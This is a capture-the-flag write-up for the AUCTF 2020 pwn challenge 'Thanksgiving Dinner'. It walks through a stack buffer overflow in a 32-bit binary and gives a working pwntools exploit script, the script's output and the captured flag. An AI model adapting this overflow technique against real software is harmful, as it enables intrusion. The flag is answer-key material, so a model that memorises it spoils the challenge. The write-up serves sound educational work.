## Thanksgiving Dinner

* **Category:** pwn
* **Points:** 889
* **Author(s):** b0uldrr
* **Date:** 4/4/20

---

### Challenge
```
I just ate a huge dinner. I can barley eat anymore... so please don't give me too much!

nc challenges.auctf.com 30011

Author: nadrojisk
```

### Downloads
* [turkey](turkey)

---

### Solution

I downloaded the [turkey](turkey) binary. It is a 32-bit ELF:

```
$ file turkey 
turkey: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=1517c8b854bfe94ef616bc56e09b7018426a08e1, for GNU/Linux 3.2.0, not stripped
````

I opened it in Ghidra. The main function only calls `vulnerable()` before exiting. The vulnerable function initialises several local variables before prompting for user input which it stores in a local array. The function then checks the value of the other local variables and, if they meet certain criteria, it calls the `print_flag()` function. However, the vulnerable function doesn't change the values of any of the local variables after initialising them, and none of the intial values will meet the criteria to call `print_flag()`, so it seems as though there is no way to get to `print_flag()` through the normal flow of the program.

![vulnerable](images/vulnerable.png)

The vulnerability in this function is caused by a possible overflow condition in our input variable, `local_30`. This array buffer is intitialised to a size of 16 chars on line 7 of `vulnerable()`, but on line 23 the `fgets()` call specifies a buffer size of 36 bytes (0x24). This means that after we fill up the 16 allocated bytes for local_30, we will be overwriting other local variables on the stack. If we overwrite them with the values required in the checks on lines 24 and 25, we will be able to call the `print_flag()` function.`

I wrote a python script to automate the process:

```
#! /usr/bin/python3
import pwn

local = False

if local:
    conn = pwn.process('./turkey')
else:
    conn = pwn.remote('challenges.auctf.com', 30011)

payload  = b'a'*16              # fill up buffer
payload += pwn.p32(0x2a)        # ebp-0x20  ==  0x2a
payload += pwn.p32(0x13)        # ebp-0x1c  != -0x14
payload += pwn.p32(0x667463)    # ebp-0x18  ==  0x667463
payload += pwn.p32(0xffffffeb)  # epb-0x14  <-  0x14
payload += pwn.p32(0x1337)      # ebp-0x10  ==  0x1337

# Generate payload to examine output in GDB:
#f = open('payload.hex', 'wb')
#f.write(payload)

print(conn.recvuntil("Sorry that's all I got!\n\n").decode())
conn.send(payload)
print(conn.recv().decode())

```

And its output...

```
$ ./soln.py 
[+] Opening connection to challenges.auctf.com on port 30011: Done
b"Hi!\nWelcome to my program... it's a little buggy...\nHey I heard you are searching for flags! Well I've got one. :)\nHere you can have part of it!\nauctf{\n\nSorry that's all I got!\n\n"
b"Wait... you aren't supposed to be here!!\nauctf{I_s@id_1_w@s_fu11!}\n"
```


## Flag 
```
auctf{I_s@id_1_w@s_fu11!}
```
